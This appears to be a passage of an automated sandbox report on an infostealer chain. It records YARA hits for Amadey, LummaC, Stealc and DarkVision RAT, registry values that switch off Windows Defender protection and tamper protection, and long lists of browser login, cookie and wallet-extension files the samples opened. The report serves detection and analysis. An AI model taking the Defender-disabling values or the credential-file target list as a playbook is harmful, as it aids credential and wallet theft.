Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FFCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00FFCBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_009565E0 LookupAccountNameA,

6_2_009565E0

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe

Registry value created: TamperProtection 0

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.skotes.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: b5c7128cd0.exe PID: 7568, type: MEMORYSTR

Yara detected DarkVision Rat

Source: Yara match	File source: 40.0.downloaded_file.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.downloaded_file.exe.a2df98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.explorer.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe82da4b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.downloaded_file.exe.cd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe83582f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe83582f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe82da4b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000003.2764516501.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2782167786.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.2762690548.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2941880948.0000000000AE8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2751422689.0000027FE834F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2778572701.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2751422689.0000027FE825C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: c92938c010.exe PID: 7172, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000026.00000003.2750899040.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936414035.0000000000111000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2936545464.0000000000111000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2948007674.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2593857071.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2bd330404c.exe PID: 1608, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: c92938c010.exe, 00000010.00000003.2553079797.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectrumcY5koo%
Source: c92938c010.exe, 00000010.00000003.2553079797.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: c92938c010.exe, 00000010.00000003.2553079797.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.jsonusnq
Source: c92938c010.exe, 00000010.00000003.2633629910.00000000015E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: c92938c010.exe, 00000010.00000003.2553079797.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3s
Source: c92938c010.exe, 00000010.00000003.2553079797.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereumn7
Source: c92938c010.exe, 00000010.00000003.2633629910.00000000015E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 0000000E.00000002.2618098916.00007FFD9BA80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
